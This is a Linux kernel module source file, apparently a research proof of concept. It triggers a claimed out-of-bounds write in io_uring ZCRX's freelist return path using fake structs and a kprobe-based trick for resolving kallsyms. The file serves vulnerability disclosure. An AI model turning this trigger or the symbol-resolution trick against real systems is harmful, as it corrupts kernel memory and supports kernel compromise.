/* * Kernel module PoC: io_uring ZCRX freelist OOB write * * Demonstrates CVE candidate: io_zcrx_return_niov_freelist() missing * bounds check on free_count vs num_niovs. * * Struct offsets verified from BTF (/sys/kernel/btf/vmlinux): * io_zcrx_area: nia@0, ifq@24, user_refs@32, freelist_lock@64, free_count@68, freelist@72 * net_iov: desc(pp@16), owner@48, type@56 * net_iov_area: niovs@0, num_niovs@8 * * Build: make -C /lib/modules/$(uname -r)/build M=$(pwd) modules * Load: insmod zcrx_oob_kmod.ko * Check: dmesg | tail -20 */ #include #include #include #include #include #include #include #include #include #include MODULE_LICENSE("GPL"); MODULE_AUTHOR("Security Research"); MODULE_DESCRIPTION("io_uring ZCRX freelist OOB PoC"); MODULE_VERSION("1.0"); /* ── kallsyms resolution via kprobe trick (works on 5.7+ kernels) ── */ typedef unsigned long (*kallsyms_lookup_name_t)(const char *name); static kallsyms_lookup_name_t my_kallsyms_lookup_name; static int resolve_kallsyms(void) { static struct kprobe kp = { .symbol_name = "kallsyms_lookup_name" }; int ret; ret = register_kprobe(&kp); if (ret < 0) { pr_err("zcrx_poc: kprobe register failed: %d\n", ret); return ret; } my_kallsyms_lookup_name = (kallsyms_lookup_name_t)kp.addr; unregister_kprobe(&kp); pr_info("zcrx_poc: kallsyms_lookup_name @ %px\n", my_kallsyms_lookup_name); return 0; } /* ── Minimal struct mirrors (BTF-verified offsets) ── */ /* * We mirror only the fields we need. The real structs have many more * members, but we allocate the full sizes to match kernel layout. */ /* net_iov_area: size=24 (BTF verified) */ struct fake_niov_area { struct net_iov *niovs; /* +0 */ size_t num_niovs; /* +8 */ unsigned long base_virtual; /* +16 */ }; /* * io_zcrx_area: size=192, aligned(64) (BTF verified) * freelist_lock @ +64 (forced align) * free_count @ +68 * freelist @ +72 */ struct fake_zcrx_area { struct fake_niov_area nia; /* +0..23 */ void *ifq; /* +24 */ atomic_t *user_refs; /* +32 */ bool is_mapped; /* +40 */ u8 _pad1; /* +41 */ u16 area_id; /* +42 */ u8 _holes[20]; /* +44..63 */ /* --- cacheline 1 boundary (64 bytes), forced align --- */ spinlock_t freelist_lock __attribute__((__aligned__(64))); /* +64 */ u32 free_count; /* +68 */ u32 *freelist; /* +72 */ /* +80: io_zcrx_mem (80 bytes), we don't need it */ u8 _mem[80]; /* +80..159 */ u8 _tail[32]; /* +160..191 */ } __attribute__((__aligned__(64))); /* net_iov: size=64, cachelines=1 (BTF verified) */ struct fake_net_iov { /* union { netmem_desc desc; struct { _flags, pp_magic, pp, ... } } */ unsigned long _flags; /* +0 */ unsigned long pp_magic; /* +8 */ struct page_pool *pp; /* +16 — NULL = copy fallback path */ unsigned long _pp_pad; /* +24 */ unsigned long dma_addr; /* +32 */ atomic_long_t pp_ref_count; /* +40 */ /* end of union @ +48 */ struct fake_niov_area *owner; /* +48 */ u32 type; /* +56 */ u32 _pad; /* +60 */ }; /* Function pointer type for io_zcrx_return_niov */ typedef void (*io_zcrx_return_niov_fn)(struct net_iov *niov); static int __init zcrx_oob_init(void) { struct fake_zcrx_area *area = NULL; struct fake_net_iov *niov = NULL; io_zcrx_return_niov_fn return_niov_fn; u32 canary = 0xDEADBEEF; u32 *freelist_guard; int ret = 0; pr_info("zcrx_poc: ========================================\n"); pr_info("zcrx_poc: io_uring ZCRX freelist OOB PoC\n"); pr_info("zcrx_poc: Target: io_zcrx_return_niov_freelist()\n"); pr_info("zcrx_poc: ========================================\n"); /* Step 1: resolve kallsyms */ if (resolve_kallsyms() < 0) return -EINVAL; return_niov_fn = (io_zcrx_return_niov_fn) my_kallsyms_lookup_name("io_zcrx_return_niov"); if (!return_niov_fn) { pr_err("zcrx_poc: io_zcrx_return_niov not found in kallsyms\n"); return -ENOENT; } pr_info("zcrx_poc: io_zcrx_return_niov @ %px\n", return_niov_fn); /* Step 2: verify struct size matches BTF */ pr_info("zcrx_poc: sizeof(fake_zcrx_area) = %zu (want 192)\n", sizeof(*area)); pr_info("zcrx_poc: sizeof(fake_net_iov) = %zu (want 64)\n", sizeof(*niov)); pr_info("zcrx_poc: offsetof(fake_zcrx_area, freelist_lock) = %zu (want 64)\n", offsetof(struct fake_zcrx_area, freelist_lock)); pr_info("zcrx_poc: offsetof(fake_zcrx_area, free_count) = %zu (want 68)\n", offsetof(struct fake_zcrx_area, free_count)); pr_info("zcrx_poc: offsetof(fake_zcrx_area, freelist) = %zu (want 72)\n", offsetof(struct fake_zcrx_area, freelist)); if (offsetof(struct fake_zcrx_area, freelist_lock) != 64 || offsetof(struct fake_zcrx_area, free_count) != 68 || offsetof(struct fake_zcrx_area, freelist) != 72) { pr_err("zcrx_poc: struct layout mismatch! Aborting.\n"); return -EINVAL; } /* Step 3: allocate area with known-small freelist (num_niovs=1) */ area = kzalloc(sizeof(*area), GFP_KERNEL); if (!area) { ret = -ENOMEM; goto out; } niov = kzalloc(sizeof(*niov), GFP_KERNEL); if (!niov) { ret = -ENOMEM; goto out; } /* * Allocate freelist for 1 niov, then add a CANARY guard word * immediately after. OOB write will land on the canary. * * Layout: [freelist[0]] [canary=0xDEADBEEF] * ^^^^^^^^^^^^^^^^^^^ * OOB write lands here */ freelist_guard = kmalloc(2 * sizeof(u32), GFP_KERNEL); if (!freelist_guard) { ret = -ENOMEM; goto out; } freelist_guard[0] = 0; /* freelist[0] = niov index 0 (free) */ freelist_guard[1] = canary; /* guard: must not change */ /* Set up area */ area->nia.niovs = (struct net_iov *)niov; area->nia.num_niovs = 1; spin_lock_init(&area->freelist_lock); area->free_count = 1; /* freelist is FULL: all 1 niovs are free */ area->freelist = freelist_guard; area->area_id = 0; /* Set up niov: pp=NULL triggers copy-fallback path in io_zcrx_return_niov */ niov->pp = NULL; /* offset 16 = page_pool pointer = NULL */ niov->owner = &area->nia; /* offset 48 */ niov->type = 3; /* NET_IOV_IOURING = 3 */ pr_info("zcrx_poc: Setup complete:\n"); pr_info("zcrx_poc: area @ %px (size %zu)\n", area, sizeof(*area)); pr_info("zcrx_poc: area->nia @ %px\n", &area->nia); pr_info("zcrx_poc: niov @ %px (pp=%px)\n", niov, niov->pp); pr_info("zcrx_poc: freelist @ %px [0]=%u [1(guard)]=0x%08x\n", freelist_guard, freelist_guard[0], freelist_guard[1]); pr_info("zcrx_poc: free_count = %u (== num_niovs=%zu → freelist FULL)\n", area->free_count, area->nia.num_niovs); pr_info("zcrx_poc:\n"); pr_info("zcrx_poc: *** Calling io_zcrx_return_niov(niov) with pp=NULL ***\n"); pr_info("zcrx_poc: Expected path: io_zcrx_return_niov_freelist(niov)\n"); pr_info("zcrx_poc: Will execute: freelist[free_count++] = niov_idx\n"); pr_info("zcrx_poc: free_count=1 == num_niovs=1 → write at freelist[1] → OOB!\n"); /* Step 4: TRIGGER - freelist is full (free_count == num_niovs == 1) */ return_niov_fn((struct net_iov *)niov); /* Step 5: check canary */ pr_info("zcrx_poc:\n"); pr_info("zcrx_poc: Post-call state:\n"); pr_info("zcrx_poc: free_count = %u (was 1, now %u)\n", area->free_count, area->free_count); pr_info("zcrx_poc: freelist[0] = %u\n", freelist_guard[0]); pr_info("zcrx_poc: freelist[1] = 0x%08x (canary was 0x%08x)\n", freelist_guard[1], canary); if (freelist_guard[1] != canary) { pr_alert("zcrx_poc: *** OOB WRITE CONFIRMED ***\n"); pr_alert("zcrx_poc: freelist[1] overwritten: 0x%08x → 0x%08x\n", canary, freelist_guard[1]); pr_alert("zcrx_poc: io_zcrx_return_niov_freelist() has NO bounds check!\n"); pr_alert("zcrx_poc: free_count=%u overran num_niovs=1\n", area->free_count); } else if (area->free_count > 1) { pr_alert("zcrx_poc: *** free_count overran num_niovs! (count=%u niovs=%zu) ***\n", area->free_count, area->nia.num_niovs); pr_alert("zcrx_poc: OOB write occurred (canary may be in same cache line)\n"); } else { pr_warn("zcrx_poc: No OOB detected — struct layout may differ.\n"); pr_warn("zcrx_poc: Check if io_zcrx_return_niov was actually called.\n"); } kfree(freelist_guard); out: kfree(niov); kfree(area); /* Return -EPERM so module unloads immediately after init */ return -EPERM; } static void __exit zcrx_oob_exit(void) { pr_info("zcrx_poc: module unloaded\n"); } module_init(zcrx_oob_init); module_exit(zcrx_oob_exit);